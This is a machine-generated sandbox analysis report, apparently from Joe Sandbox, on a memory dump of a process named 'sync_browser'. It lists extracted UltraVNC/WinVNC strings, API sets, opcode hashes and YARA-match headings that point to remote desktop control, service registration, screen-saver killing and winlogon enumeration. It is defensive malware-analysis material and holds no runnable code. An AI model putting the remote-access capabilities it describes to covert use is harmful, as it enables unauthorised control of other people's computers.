                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                    • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                    • API String ID: 333848887-3586523739
                                                                    APIs
                                                                    Strings
                                                                    • x, xrefs: 00007FF6DC0F0A25
                                                                    • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF6DC0F0AAC
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                    • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                    • API String ID: 3190128964-2508378015
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                    • String ID: schook$w8hook
                                                                    • API String ID: 2828954817-2864610768
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D5F1B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D5FAF
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D5FF6
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D6160
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D5F61
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D5FC8
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D557A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D5603
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D564A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D577E
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D55BD
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D561C
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                    • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                    • API String ID: 1123868200-453874877
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                    • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1907048692-1814171851
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID:
                                                                    • API String ID: 1881577244-0
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                    • String ID:
                                                                    • API String ID: 2677898628-0
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave
                                                                    • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2801635615-1537001432
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                                    • API String ID: 3168844106-4245644328
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                    • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                    • API String ID: 1719662965-904825817
                                                                    APIs
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                    • String ID:
                                                                    • API String ID: 4219907860-0
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                    • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                    • API String ID: 769895750-1251308945
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$Free$AddressLoadProc
                                                                    • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                    • API String ID: 1386263645-671781545
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                    • API String ID: 3057866299-2798169553
                                                                    APIs
                                                                    Strings
                                                                    Yara matches
Similarity
• API ID: Close$CreateOpenQueryValueVersion
• String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
• API String ID: 1076069355-3579764778
• Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
• Instruction ID: 67ef9a1807350f0c9a59fa59eab74c6a97f25db44610361fb92caec0db3ab396
• Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
• Instruction Fuzzy Hash: 14315772A08B9685EB608B10F8553AEB364FBC9754F800136E69D82A54DF7CD12ACF40
Similarity
• API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
• String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
• API String ID: 1547096108-1130181218
• Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
• Instruction ID: 12d4906d1c43353b24e8e6eb955b66d1d22b22477235e65f9b38b71dee8fa221
• Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
• Instruction Fuzzy Hash: 76316435A2869A81FA60DB21EC25BBD2354FF88744F844133D90EC2695DF3CE12BCB00
Similarity
• API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
• String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
• API String ID: 649669561-4005017345
• Opcode ID: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
• Instruction ID: be8bf6ee2dcf732f7b4697a8e0618221b2c4e6bd42eee3bc4cbb0726c6655ca5
• Opcode Fuzzy Hash: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
• Instruction Fuzzy Hash: 64212C31A09B1982EB089F64FC4436C73E4FB48B94F444136D96D86394EF7CE566CB50
Similarity
• API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
• String ID: c
• API String ID: 295735435-112844655
• Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
• Instruction ID: 7788de42f3bae5248de271feb41884fa3e17f4ebe3d08e65ce82fdc0b946ebc7
• Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
• Instruction Fuzzy Hash: F321FC25A18B55C3EA209F22F8941AE6374FB88B91F444132DB9E83B65DF3CE557C740
Similarity
• API ID: CriticalSection$CountEnterLeaveTick
• String ID:
• API String ID: 1056156058-0
• Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
• Instruction ID: f053178b534d9faa6b6ca528d421d5456145ed7332fe05702a035bc0846a91e5
• Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
• Instruction Fuzzy Hash: B4D13D76A19B4A8AEB14CF69E9402AC33E4FB58B88F405137DA4D83758DF3DE426C750
Similarity
• API ID: Combine$DataDeleteObjectRegion$free
• String ID:
• API String ID: 1378972593-0
• Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
• Instruction ID: 7fb9bcbb2dcd31ed9e5052c7d5eefe8aa2d6acb5e298e63590eb16841b14bd3b
• Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
• Instruction Fuzzy Hash: 9C7190B6A0469586EB50CF2AE44066DBBA0F789BD4B44D132EF4D83B54CF3DD592CB40
Similarity
• API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
• String ID:
• API String ID: 707770685-0
• Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
• Instruction ID: 0a273fd2fabd82d45251f267aac6fa7a7688b93d8c0db4fb353e4da14350c705
• Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
• Instruction Fuzzy Hash: 4B418F32608B45C6E750DB1AE8842AD7760FBC9BE0F540232EA9E837A5CF3DD516CB00
Similarity
• API ID: Combine$DeleteObjectfree$CreateRect
• String ID:
• API String ID: 3143477926-0
• Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
• Instruction ID: 8a9b1348e03c3859aa156fc3fc8df7b482c9bcc624c3a6b8ab5dfcd001afd7c8
• Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
• Instruction Fuzzy Hash: 7E41A172608A8A81DA50DB16E89446E7734FBCABE4F405133EE5E877A4CF3DD556C700
Similarity
• API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
• String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
• API String ID: 524037307-261918508
• Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
• Instruction ID: b3a6108bf221f6c29090125a8b0387a006e2f92357e5aa932735465f54c9b552
• Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
• Instruction Fuzzy Hash: 8321ED32504B96D1D701DF24ED812EC73ECFF54B88F984136DA5C8A6A9DF7892A6C350
Similarity
• API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
• String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 4065787043-3977938048
• Opcode ID: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
• Instruction ID: c6884762f74210d1fcae0de713fe305ff19465baa45c14fb7d669c2f1fe516e8
• Opcode Fuzzy Hash: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
• Instruction Fuzzy Hash: D1E1D222A086D585F7548B65C8487FE27A9EB85B94F154237CB5CC73E5CF3AE462CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Desktop$CloseInputOpen
• String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
• API String ID: 1367241101-2270697846
• Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
• Instruction ID: f8282a3729ac4448d0767ed18528693ae43ac3d282bfb8f0cfa87c6bc297a4af
• Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
• Instruction Fuzzy Hash: 46D1E522A086D984FB50CB69C4587FE3BA9EB85B44F194137CA4CC77A1CF3AD466C700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
• API String ID: 145871493-4162899161
• Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
• Instruction ID: 1f7c0905bacd6bb432ea1f0e27abbbed4964328b6d45395a0e4b36f801290e13
• Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
• Instruction Fuzzy Hash: A841B232609B4A96E6648F05E8402AD73A4FBC5BB0F550236DE6D83794EF3DE467CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
• String ID: VncEvent
• API String ID: 2428488660-2681191898
• Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
• Instruction ID: 6d89f1f522977f51c8111f2517ee2a2375d456af13021b937b0ab48ef9c16aad
• Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
• Instruction Fuzzy Hash: 4211A020F0C75B46FB549F22BE1437D2799EF89B88F089032C91EC2690DF2CA4A78700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$AddressProc$LibraryLoad
• String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
• API String ID: 3015439405-2946900448
• Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
• Instruction ID: 3fd10014eac722ccb45ad557178080d385a393a4df132a899b6c12b32c4220c4
• Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
• Instruction Fuzzy Hash: 69213871914B9A81EB04CF24FC952AC33A9FB05B48F144136CE5D97368EF3C95AAC760
APIs
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
• String ID:
• API String ID: 101574016-0
• Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
• Instruction ID: e382eb2db1eab03573651f63888371a155e540ee484344df0713c6332f70a52a
• Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
• Instruction Fuzzy Hash: 03A19D61E0D76BA1FA15BB15AD00A7D2298AF80BA4F548637DE5D87BC5DE3CF4638300
APIs
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
• String ID:
• API String ID: 3219262609-0
• Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
• Instruction ID: bc35fd591ef492416d44d8c968b2f7fd6274fbfc3b46cf603c80d5dc8171143d
• Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
• Instruction Fuzzy Hash: 8A31A451E0C67A95FA55AF519D00B7D2198AF85BD0F184633ED5EC77C6EE2CA423C300
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
• String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
• API String ID: 173432231-678763868
• Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
